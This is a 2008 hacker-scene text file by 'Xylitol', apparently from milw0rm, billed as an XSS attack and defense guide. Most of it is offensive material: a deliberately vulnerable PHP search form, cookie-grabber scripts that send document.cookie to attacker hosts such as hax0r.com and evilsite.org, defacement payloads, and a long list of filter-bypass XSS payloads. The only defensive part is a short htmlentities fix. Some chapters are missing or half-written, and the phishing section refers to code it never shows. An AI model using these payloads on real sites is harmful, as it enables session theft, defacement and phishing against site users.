/ /
________________________________________________________________________/ /
| / /
| Cross Site Scripting - Attack and Defense guide / /
|_____________________________________________________________________/ /
/ /
By Xylitol 10-02-08 /___/
Author: Xylitol
Homepage: http://xylitol.free.fr
Contact: Xylitol[at]fbi[dot]gov
Date: 10/02/08
Summary:
1> What is XSS ?
2> Code a XSS vulnerability
3> Make a cookie grabber
4> Securing XSS
5> Deface Methods
6> Filteration Bypassing
7> Flash attak
8> XSS upload
9> phishing XSS
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.: Chapter 1 - What is XSS ? :.\ \ |
|___/ /___________________________________________\ \___|
/ / (From Wikipedia, the free encyclopedia) \ \
/___/ \___\
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style><title>Simple XSS vulnerability by Xylitol</title>
<body>
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Search:</strong></td>
<td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /
></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262"><div align="center">
<input name="submit" type="submit" value=" Search it ! " />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>
_______________________________________
/ http://127.0.0.1 dit: X \
|________________________________________|
| |
| |
| ^ |
| / \ |
| / | \ XSS |
| / . \ |
| ------- |
| ______ |
| | OK | |
| ------ |
|________________________________________|
XSS Vulnerability is here...
____ ____
/ / \ \
______/ /____________________________________\ \______
| / / \ \ |
| / /.: Chapter 3 - Make a cookie grabbers :.\ \ |
|___/ /__________________________________________\ \___|
/ / \ \
/___/ \___\
<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 4 - Securing XSS :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\
FIX it:
for fix XSS Vulnerability use htmlentities:
in line 16 Remplace:
<body>
<span class="alerte">Search result :</span> <strong><?php echo
$_POST['Vulnerability']; ?></strong>
</body>
By:
<body>
<span class="alerte">Search result :</span> <strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?
></strong>
</body>
other function:
htmlentities() quotes
strip_tags()
...
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 5 -deface Methods :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\
defacement by an image:
<IMG SRC="http://hax0r.com/Haxored.png">
or a video flash:
<EMBED SRC="http://hax0r.com/Haxored.swf"
also see:
<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 6 - Filteration Bypassing :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script alert(String.fromCharCode(88,83,83))</script>
<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">
window.alert("Xyli !");
<body onLoad="alert('XSS');"
<body onunload="javascript:alert('XSS');">
[url=javascript:alert('XSS');]click me[/url]
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
<font style='color:expression(alert(document.cookie))'>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script src=http://yoursite.com/your_files.js></script>
"><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<marquee><script>alert('XSS')</script></marquee>
<? echo('<scr)';
echo('ipt>alert(\"XSS\")</script>'); ?>
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<marquee><script>alert('XSS')</script></marquee>
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<script>alert(String.fromCharCode(88,83,83))</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+
escape(document.cookie)</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>alert('XSS');</script>
<script>alert(1);</script>
here the handling of the actionscript and the Javascript to post a alert:
getURL("javascript:alert('XSS'");
and in Haxored.js:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;
For secure it simple solution: do not allow flash files in your web app
____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Chapter 8 - XSS upload :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\
PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ
____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Chapter 9 - Phishing XSS :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\
you will have it to guess script will simulate a form of connextion and send the
value to you
example of file php for sending this email (mail.php):
the user will believe that the waiter and overloads some and will not suspect
nothing
I think that you understood this principle ?
____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Xylitol respects and hello's fly out :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\
_________________________________
| |
| .: Xylitol thanks this sites :. |
|_________________________________|
http://www.googlebig.com/
http://xssed.com/
http://www.xssing.com/
http://www.milw0rm.com/
http://H4cky0u.org/
# milw0rm.com [2008-02-18]